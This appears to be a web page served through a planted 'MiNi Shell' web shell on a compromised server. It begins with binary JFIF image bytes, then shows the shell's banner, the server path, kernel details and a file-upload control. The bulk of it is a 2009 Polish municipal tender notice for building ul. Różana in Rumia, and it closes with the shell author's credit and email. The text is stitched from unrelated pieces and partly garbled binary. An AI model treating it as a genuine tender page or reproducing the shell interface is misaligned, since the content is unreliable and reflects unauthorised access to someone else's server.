JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/167746-N-2009.html

<p class="kh_header"><b>Rumia: Budowa ul. Różanej na odcinku od ul. Kosynierów do ul. Partyzantów w Rumi.</b><br>
<b>Numer ogłoszenia: 167746 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Rumia , ul. Sobieskiego 7/204, 84-230 Rumia, woj. pomorskie, tel. 058 6719410, faks 058 6796517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul. Różanej na odcinku od ul. Kosynierów do ul. Partyzantów w Rumi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje wykonanie następujących robót: 
       1)   budowa nawierzchni drogowej ulicy Różanej na odcinku od ul. Kosynierów do ul. Partyzantów (HM 0+00.00 ÷ 
              7+91,57) wg projektu budowlano-wykonawczego i szczegółowej specyfikacji technicznej,
      2)    budowa sieci kanalizacji deszczowej w ul. Różanej na odcinku od ul. Kosynierów do ul. Partyzantów w/g projektu
             budowlano-wykonawczego i szczegółowej specyfikacji technicznej,
      3)    budowa ścieżki rowerowej przy ul. Różanej na odcinku od ul. Kosynierów do ul. Partyzantów w/g projektu 
             budowlano-wykonawczego i szczegółowej specyfikacji  technicznej,
      4)     budowa oświetlenia ulicznego ul. Różanej na odcinku od ul. Kosynierów do ul. Partyzantów w/g projektu 
              budowlano-wykonawczego i szczegółowej specyfikacji technicznej,
      5)     usunięcie kolizji linii kablowych 0,4 kV i 15 kV elektrycznych w ciągu ul. Różanej w HM 0+00,00 ÷ 7+91,57 
              wg projektu budowlano-wykonawczego i szczegółowej specyfikacji technicznej,
 6)    usunięcie kolizji z układem drogowym gazociągu w ul. Różanej wg projektu budowlano-wykonawczego 
        przebudowy gazociągu niskiego ciśnienia DN100 i szczegółowej specyfikacji technicznej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.21.30-2, 45.11.00.00-8, 45.23.14.00-9, 45.31.61.10-9, 45.23.12.20-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 80000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
     nakładają obowiązek posiadania takich uprawnień;
       2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do 
            wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
            technicznego i osób zdolnych do wykonania zamówienia i którzy:
           -  wykonali roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania 
               o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  o charakterze 
               odpowiadającym przedmiotowi zamówienia tj.  zrealizowaniu co najmniej dwóch kontraktów w każdej 
               z poniższych branż na:
a/ budowę nawierzchni drogowej wykonanej z betonu asfaltowego o powierzchni 4.000 m2 
    i wartości każdego nie mniejszej niż 1.500.000 zł brutto,
b/ budowę nawierzchni wykonanej z kostki betonowej o powierzchni 3.000 m2 i wartości  
    każdego nie mniejszej niż 1.000.000 zł brutto,
c/ budowę kanalizacji deszczowej o długości minimum 1.000 mb i wartości  każdego nie 
    mniejszej niż 800.000,00 zł brutto.

        Powyższe wymagania  Zamawiający uzna za spełnione również w sytuacji gdy kontrakt obejmuje więcej niż jedną  branżę, pod warunkiem że każda z nich spełnia wyżej wymienione wymagania.

      -     osoby jakimi dysponują lub będą dysponowali Wykonawcy i które będą uczestniczyć w wykonaniu zamówienia, 
            wraz z informacjami na temat ich kwalifikacji zawodowych i   wykształcenia niezbędnych do wykonania 
            zamówienia, a także zakresu  wykonywanych przez nich czynności (z załączeniem uprawnień dla kierownika 
            budowy z uprawnieniami drogowymi i kierowników robót w branży sanitarnej, elektrycznej i gazowej oraz 
            zaświadczeń o wpisie na listę członków Okręgowej Izby Inżynierów Budownictwa);
     -    posiadają pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do 
      wykonania zamówienia, jeżeli w wykazie, o którym mowa w Rozdziale I, pkt 2, Wykonawca 
      wskazał osoby, którymi będzie  dysponował; 
     -    dysponują lub będą dysponowali  niezbędnymi do wykonania zamówienia narzędziami  i urządzeniami tj. 
      co najmniej:
            a) rozkładarka mieszanek mineralno-asfaltowych, szerokość min. 7,5 m,
            b) walce samojezdne stalowe min 8 ton - 2 szt.,
            c) walce wibracyjne min. 7,5 tony - 2 szt.,
            d) walec samojezdny ogumiony min. 10 ton - 1 szt.,
            e) koparko-ładowarki min. 0,6 m3 - 2 szt.,
            f) samochody - wywrotki min. 10 ton - 4 szt.,
            g) zagęszczarki - ciężar min. 80 kg - 4 szt.,
            h) wytwórnia mieszanki mineralno-bitumicznej - 1 szt.

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.; wniosą wymagane  wadium oraz są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 1.000.000,00 zł.  
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp;
5)	udzielą gwarancji na przedmiot zamówienia na okres co najmniej 36 miesięcy;
6)	wyrażają zgodę na wszystkie warunki określone w SIWZ oraz projekcie umowy.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
    Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych oświadczeń 
    i dokumentów, według formuły spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp składa następujące dokumenty:
1)	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy pzp oraz oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 pzp.;
2)	Pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik; 
3)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed dniem składania ofert.
4)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
          Warunki wymienione w części A pkt 1, 3, 4, 5 i 6 mają zastosowanie do wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, natomiast wymagania wymienione w części A pkt 2 Wykonawcy spełniają łącznie.

B. W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
   1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego 
        postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  
        o charakterze odpowiadającym przedmiotowi zamówienia tj.  zrealizowaniu co najmniej dwóch kontraktów w każdej
        z poniższych branż na:
a/ budowę nawierzchni drogowej wykonanej z betonu asfaltowego o powierzchni 4.000 m2  i wartości każdego nie  
    mniejszej niż 1.500.000 zł brutto,
b/ budowę nawierzchni wykonanej z kostki betonowej o powierzchni 3.000 m2 i wartości  każdego nie mniejszej niż 
    1.000.000 zł brutto,
c/ budowę kanalizacji deszczowej o długości minimum 1.000 mb i wartości  każdego nie  mniejszej niż 800.000,00 zł 
    brutto.

           Powyższe wymagania  Zamawiający uzna za spełnione również w sytuacji gdy kontrakt obejmuje więcej niż jedną  branżę, pod warunkiem że każda z nich spełnia wyżej wymienione wymagania.

2)	wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (z załączeniem uprawnień dla kierownika budowy z uprawnieniami drogowymi i kierowników robót w branży sanitarnej, elektrycznej i gazowej oraz zaświadczeń o wpisie na listę członków Okręgowej Izby Inżynierów Budownictwa);
3)   pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli 
 w wykazie, o którym mowa w pkt 2, Wykonawca wskazał osoby, którymi będzie  dysponował; 
4)  wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje 
 Wykonawca tj. co najmniej:
        a) rozkładarka mieszanek mineralno-asfaltowych, szerokość min. 7,5 m,
        b) walce samojezdne stalowe min 8 ton - 2 szt.,
        c) walce wibracyjne min. 7,5 tony - 2 szt.,
        d) walec samojezdny ogumiony min. 10 ton - 1 szt.,
        e) koparko-ładowarki min. 0,6 m3 - 2 szt.,
        f) samochody - wywrotki min. 10 ton - 4 szt.,
        g) zagęszczarki - ciężar min. 80 kg - 4 szt.,
        h) wytwórnia mieszanki mineralno-bitumicznej - 1 szt.

Warunki wymienione w części  B Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają łącznie.

C. W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
-	dowód wpłaty wadium;
-	polisę, a w przypadku jej braku inny dokument potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Suma gwarancyjna w zakresie prowadzonych robót (kontraktowa) oraz szkód rzeczowo-finansowych (deliktowa) nie może być niższa niż 1.000.000,00 zł.  

Warunki wymienione w pkt C Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełniają łącznie. 

D. Inne dokumenty lub oświadczenia:
1)	wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1;
2)	uproszczony kosztorys ofertowy - skrócona forma kosztorysu, mówiąca ile kosztują poszczególne prace bez wyszczególniania potrzebnych materiałów, czasu pracy i kosztów sprzętu.

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 
  - Oferta winna zawierać: oświadczenia i dokumenty opisane w tekście w części A, B, C i D..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rumia.eu                                  (BIP - zamowienia publiczne - przetargi aktualne).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, Pokój nr 213.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2009 godzina 12:30, miejsce: Urząd Miasta  Rumia, 84-230 Rumia, ul. Sobieskiego 7, Pokój nr 204.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com